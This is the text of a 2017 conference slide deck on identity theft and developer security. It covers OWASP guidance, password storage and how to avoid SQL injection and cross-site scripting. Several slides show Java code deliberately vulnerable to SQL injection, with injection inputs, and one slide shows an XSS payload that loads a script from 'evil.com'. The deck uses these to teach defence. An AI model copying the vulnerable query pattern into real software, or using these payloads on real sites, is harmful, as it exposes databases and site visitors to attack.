Identity theft and cybercrime pose real threats that are growing as organized criminal networks engage in cybercrime as a profitable business. As developers, we must be aware of security risks and integrate protections into our work, including securing passwords, preventing SQL injection, and avoiding cross-site scripting vulnerabilities. The Open Web Application Security Project (OWASP) provides guidance on application security best practices developers should follow.

1. Identity theft
developers are key
JavaZone 2017

2. Identity theft
Cybercrime
Hard to get rid of the consequences
We create the code
We protect the data

3. Are we part of the solution
Or part of the problem?

4. Brian Vermeer
Software Engineer

5. Cybercrime
Real threat
and it is growing
Organised and professional
it’s a business
Risks are low
We are not ready
Lot of money involved

6. How profitable is cybercrime?
Bank of Iraq Heist (2003)
1 Billion dollars
US Military and Defence Expanses
(2015)
600 Billion dollars
Cyber crime damage world wide
(2016)
3 Trillion dollars

7. Identity theft
Identity theft is the deliberate use of someone else's
identity, usually as a method to gain a financial advantage or
obtain credit and other benefits in the other person's name,
and perhaps to the other person's disadvantage or loss.
The person whose identity has been assumed may suffer
adverse consequences if they are held responsible for the
perpetrator's actions.

8. Kevin Goes (30)
Some else used a copy of his
passport
and rented several houses

9. Kevin Goes (30)

10. Data is like crude oil
by itself it is dead, but comes to live when applying the right
kind of science

12. What can we do as developers
Protect yourself & be aware

13. Protect youself
Where do I leave my notebook ?
Where do I store my passwords ?
Do I use my password multiple times ?
Is my software up to date ?
2 step verification ?
What wifi hotspot do I use ?

15. Software Development

16. Our application
What we think it is
What it actually is

18. How many dependencies?
Are all needed?
Are all up-to-date?
Are all reliable?
Dependencies

20. Don't trust blindly

21. Security
as part of your development process
business value VS security
code reviews
clean code = secure code

22. OWASP - ASVS
Open Web Application Security
Project
Application Security Verification
Standard
https://www.owasp.org/index.php/
Category:OWASP_Application_Securit
y_Verification_Standard_Project

23. Code review
String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
Connection conn = DriverManager.getConnection(url);
Statement stmt = conn.createStatement();
String newName = request.getParameter("name");
String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
stmt.execute(sql);

24. Code review
String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
Connection conn = DriverManager.getConnection(url);
Statement stmt = conn.createStatement();
String newName = request.getParameter("name");
String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
stmt.execute(sql);
what if my input = ' '; '
UPDATE USERS SET NAME =' '; ' WHERE id=1;

25. SQL Injection
String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
Connection conn = DriverManager.getConnection(url);
Statement stmt = conn.createStatement();
String newName = request.getParameter("name");
String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
stmt.execute(sql);
what if my input = ' '; UPDATE Users SET name = ' '
UPDATE USERS SET NAME =' '; UPDATE Users SET name = '' WHERE id=1;

26. Query Parameterization
String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
Connection conn = DriverManager.getConnection(url);
String newName = request.getParameter("name");
String sql = "UPDATE Users SET name = ? WHERE id=1";
PreparedStatement pstmt = conn.prepareStatement(sql);
pstmt.setString(1, newName);
pstmt.executeUpdate();

27. Password storage

28. Password protection
Don’t store plain text
Don’t limit the password length
Don’t limit the character set
Don’t use an ordinary hash function

29. Password protection
Use a password policy
Use a cryptographically strong credential-specific salt
Use a cryptographic hash algorithm (e.g. PBKDF2)
Use a HMAC (keyed-hash message authentication code), HMAC-SHA256
Design to be compromised

30. XSS (Cross Side Scripting)
http://www.javazone.no/saveComment?comment=JavaZone+is+Awesome!
<h3> Thank you for you comments! </h3>
You wrote:
<p/>
JavaZone is Awesome
<p/>

31. XSS (Cross Site Scripting)
http://www.javazone.no/saveComment?comment=<script src="evil.com/
x.js"></script>
<h3> Thank you for you comments! </h3>
You wrote:
<p/>
<script src="evil.com/x.js"></script>
<p/>

32. Summary
BE AWARE
Protect yourself
Integrate security in development
process
https://www.owasp.org
ASVS

33. Brian Vermeer
@BrianVerm
brian@brianvermeer.nl